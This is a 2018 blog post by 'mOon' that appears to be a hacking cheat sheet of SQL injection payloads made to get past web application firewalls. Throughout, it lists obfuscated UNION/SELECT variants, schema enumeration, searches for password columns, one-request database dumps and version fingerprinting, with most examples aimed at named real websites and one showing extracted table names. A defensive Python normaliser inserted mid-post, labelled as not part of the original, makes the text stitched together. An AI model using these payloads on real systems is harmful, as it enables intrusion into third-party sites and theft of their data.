Some bypass statements


Jun 17 2018


WAF evasion methods for SQL injections

I want to share WAF evasion methods for SQL injections. Most are old but a few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors with these methods.

1) id=1+UnIoN+SeLecT 1,2,3 --+

2) id=1+UnIOn/**/SeLect 1,2,3 --+

3) id=1+UNIunionON+SELselectECT 1,2,3 --+

4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+

5) id=1 and (select 1)=(Select 0xAA 1000 more A's)+UnIoN+SeLeCT 1,2,3 --+

6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2,3 --+

7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+

8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2C1,2,3 --+

9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+

After the id number, like id=1+/*!and*/+1=0:
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)

Or make the URL query false:
id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select

+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/

like:
http://www.phm.ie/project.php?cat=Conservation'+and(1)=(0)+union+distinct+select+1
and use "and 1=0" to make the column numbers appear on the page, or:
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)

Hard WAF bypass tips

Whitespaces:
union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
%0Aunion%0Aselect%0A1,2,3--
/**/union/**/select/**/1,2,3--
like:
http://www.goavenues.com/list_itinerary.php?id=-4%20union%20%28select%201,2,version%28%29,4,5,6,7,8%29%20--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
NICE QUERY
www.zerocoolhf.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+

www.zerocoolhf.altervista.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Bypassing:
(Double Keyword): UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni<on all sel<ect
%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
id=1+'UnI"On'+'SeL"ECT' <- MySQL only
id=1+'UnI'||'on'+SeLeCT' <- MSSQL only
like:
http://www.goavenues.com/list_itinerary.php?id=-4%20union%23aa%0Aselect%201,2,version%28%29,4,5,6,7,8%20--
http://www.goavenues.com/list_itinerary.php?id=-4%20/**/union/*!50000select*/%201,2,version%28%29,4,5,6,7,8%20--
http://www.goavenues.com/list_itinerary.php?id=-4%20/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/%201,2,version%28%29,4,5,6,7,8%20--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
After the id number, like id=1+/*!and*/+1=0:
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Make the URL query false:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Order bypassing, do it like this:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/*!table_name*/+from /*!information_schema*/./*!tables*/ where table_schema=database()
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))) /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
(char(37,112,97,115,115,37) is the string '%pass%')
like:
http://www.westbury.com/article.php?article_id=-117%20union%20select%201,2,unhex%28hex%28Concat%28Column_Name,0x3e,Table_schema,0x3e,table_Name%29%29%29,4,5,6,7/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char%2837,%20112,%2097,%20115,%20115,%2037%29--
Output: user_passwd>westbur6_website>user_info
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Used with order:
convert(... using ascii) or unhex(hex(...))
like:
www.westbury.com/article.php?article_id=-117 union select 1,2,convert(group_concat(table_name) using ascii),4,5,6,7+from+information_schema.tables --
If 'ascii' doesn't work, you can try one of these character sets instead:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2312
armscii8
ascii
binary
cp1250
big5
cp1251
cp1256
cp1257
cp850

------------------------------Best Bypass WAF------------------------------------

[~] order by [~]
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all sel<ect
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLecT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel?<ect
+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
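Added example, not part of the original post: a small Python normaliser that a WAF rule or log-analysis job can apply before keyword matching, so that the comment, URL-encoding, whitespace and nested-keyword variants listed above collapse to one canonical form. The comment handling follows MySQL's rules (the body of a `/*!NNNNN ... */` versioned comment is executed, ordinary `/* */`, `#` and `-- ` comments are not); the `UNION_SELECT` regex is a heuristic, not a SQL grammar, and the sample payload is constructed to mirror variant 3) above.

```python
import re
from urllib.parse import unquote_plus

def decode_url(s: str) -> str:
    """Percent-decode until stable so %252f-style double encoding collapses; '+' becomes a space."""
    while (decoded := unquote_plus(s)) != s:
        s = decoded
    return s

def strip_comments(s: str) -> str:
    """Read comments as MySQL does: the body of /*!NNNNN...*/ runs, /*...*/ '#' and '-- ' do not."""
    out, i, n = [], 0, len(s)
    while i < n:
        if s.startswith("/*!", i):          # versioned comment: drop marker and digits, keep the body
            i += 3
            while i < n and s[i].isdigit():
                i += 1
            out.append(" ")
        elif s.startswith("/*", i):         # ordinary comment: drop through the closing */
            j = s.find("*/", i + 2)
            out.append(" ")
            i = n if j < 0 else j + 2
        elif s.startswith("*/", i):         # closing token of a versioned comment
            out.append(" ")
            i += 2
        elif s.startswith("#", i) or s.startswith("-- ", i):   # line comment: drop to end of line
            j = s.find("\n", i)
            out.append(" ")
            i = n if j < 0 else j + 1
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

def normalize(raw: str) -> str:
    """Decode, strip comments, collapse the %09 %0A %0B %0C %0D %A0 whitespace variants, lower-case."""
    return re.sub(r"[\s\x0b\x0c\xa0]+", " ", strip_comments(decode_url(raw))).strip().lower()

# Heuristic match; the gap of up to 32 chars tolerates UNIunionON / SELselectECT style splitting.
UNION_SELECT = re.compile(r"union[\s\S]{0,32}?select")

def is_union_injection(raw: str) -> bool:
    return UNION_SELECT.search(normalize(raw)) is not None

def delete_keywords(raw: str) -> str:
    """The naive 'sanitizer' that UNIunionON defeats: deleting the keyword once leaves UNION behind."""
    return re.sub(r"union|select", "", raw, flags=re.I)

SAMPLE = "id=1+UNIunionON+SELselectECT 1,2,3 --+"   # constructed, mirrors variant 3) in the list
```

The lesson for the WAF side is in `delete_keywords`: a request that is "sanitised" by deleting keywords still matches `is_union_injection`, so blocking on the normalised form is the right response, not stripping.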

[~] information_schema.tables [~]
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=0x<hex of the table name>
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like 0x<hex of the table name>

[~] concat() [~]
CoNcAt()
concat() 
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
Group_Concat
group_concat()
/*!group_concat*/()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
CoNcAt()
CONCAT(DISTINCT Version())
concat(,0x3a,)
concat%00()
%00CoNcAt()
/*!50000cOnCat*/(/*!Version()*/)
/*!50000cOnCat*/
/**//*!12345cOnCat*/(,0x3a,)
concat_ws()
concat(0x3a,,0x3c62723e)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3a3a,version()
CONCAT_WS(CHAR(32,58,32),version(),)
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1)

[~] after id no. like id=1 +/*!and*/+1=0 [~]
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)

More character sets for the convert(... using ...) trick above:
cp852
cp866
cp932
dec8
euckr
latin1
utf8
Trick to make the info appear inside an img tag:
concat(0x223e3c62723e,,0x3c696d67207372633d22)
(0x223e3c62723e is '"><br>' and 0x3c696d67207372633d22 is '<img src="'; the column goes between the two commas)
This is for when the column lands inside an HTML tag, but it is not always an img tag; it could be <a> or </noscript> or anything.
like:
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ concat(0x223e3c2f613e3c2f74643e,version(),0x3c6120687265663d22)--+
(0x223e3c2f613e3c2f74643e is '"></a></td>' and 0x3c6120687265663d22 is '<a href="')
[DUMP DB in 1 Request]
(select(@) from (select(@:=0x00),(select(@) from (information_schema.columns) where (table_schema>=@) and (@) in (@:=concat(@,0x0a,'[',table_schema,'] >',table_name,' > ',column_name))))x)
(select(@) from (select(@:=0x00),(select(@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)

[DUMP DB in 1 Request improved]
(select(@x) from (select(@x:=0x00),(select(0) from (information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
(0x696e666f726d6174696f6e5f736368656d61 is 'information_schema', 0x3c62723e is '<br>', 0x2e is '.', 0x3a is ':')
like:
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --

WHITESPACES BYPASS
%09 %0A %0B %0C %0D %A0

Get version - DB_NAME - user - HOST_NAME - datadir
version()
convert(version() using latin1)
unhex(hex(version()))
@@GLOBAL.VERSION
(substr(@@version,1,1)=5) :: 1 true, 0 false
# like #
www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 --
1 means version 5 and 0 means version 4
+and substring(version(),1,1)=4
+and substring(version(),1,1)=5
+and substring(version(),1,1)=9
+and substring(version(),1,1)=10
# like #
www.marinaplast.com/page.php?id=13+and substring(version(),1,1)=5
page loads normally: version 5
www.marinaplast.com/page.php?id=13+and substring(version(),1,1)=4
page does not load normally: not version 4
version 5
id=1 /*!50094aaaa*/ error
id=1 /*!50095aaaa*/ no error
id=1 /*!50096aaaa*/ error
# like #
www.marinaplast.com/page.php?id=13 /*!50095aaaa*/ no error, v5
version 4
id=1 /*!40123 1=1*/--+- no error
id=1 /*!40122rrrr*/ no error
# like #
www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error, not v4
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DB_NAME()
@@database
database()
id=vv()
# like #
www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 --
www.marinaplast.com/page.php?id=vv()
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
@@user
user()
user_name()
system_user()
# like #
www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 --
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
HOST_NAME()
@@hostname
@@servername
SERVERPROPERTY()
# like #
www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 --
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
@@datadir
datadir()
# like #
www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 --
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ASPX
and 1=0/@@version
' and 1=0/@@version;--
) and 1=@@version--
and 1=0/user;--


Copyright notice: unless otherwise noted, this article is original work by mOon; please keep the source link when reposting.
